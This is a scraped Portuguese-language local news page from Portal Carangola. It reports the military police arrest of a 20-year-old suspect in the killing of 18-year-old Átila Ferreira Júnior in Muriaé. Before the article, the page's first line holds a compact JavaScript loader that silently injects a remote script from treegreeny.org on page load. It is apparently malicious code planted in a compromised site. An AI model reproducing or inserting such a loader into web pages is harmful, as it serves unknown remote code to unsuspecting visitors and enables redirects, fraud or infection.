;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Assassinato no Vermelho II: Polícia Militar anuncia prisão do autor no bairro Dornelas. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Assassinato no Vermelho II: Polícia Militar anuncia prisão do autor no bairro Dornelas.

A Polícia Militar de Muriaé anunciou nesta manhã de domingo (01/01) por volta das 09h15, a prisão de um jovem de 20 anos de idade, autor da morte de outro jovem, Átila Ferreira Júnior, 18 anos, assassinado no bairro Vermelho II, no meio da madrugada deste domingo. A prisão aconteceu seis horas após o crime.

O Sargento Tureta relatou que todas as equipes estavam trabalhando com o objetivo de localizar o autor desde a hora que ocorreu o fato. As equipes retornaram ao bairro Vermelho II e também ao Nova Muriaé, onde o autor reside.

“A Polícia Militar foi acionada via 190, e as informações davam conta de que um familiar da vítima havia sido ameaçada com arma de fogo, pelo mesmo autor do crime. No local indicado, não foi possivel prendê-lo em flagrante, pois evadiu. Dando continuidade às diligências pelo Vermelho II, recebemos novas informações de que suspeitos estariam próximos a uma padaria no bairro Dornelas, e neste local indicado, tivemos êxito em surpreender o autor e prendê-lo e agora estamos tentando localizar a arma do crime”, ressalta o militar.

Fonte: Radio Muriaé

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.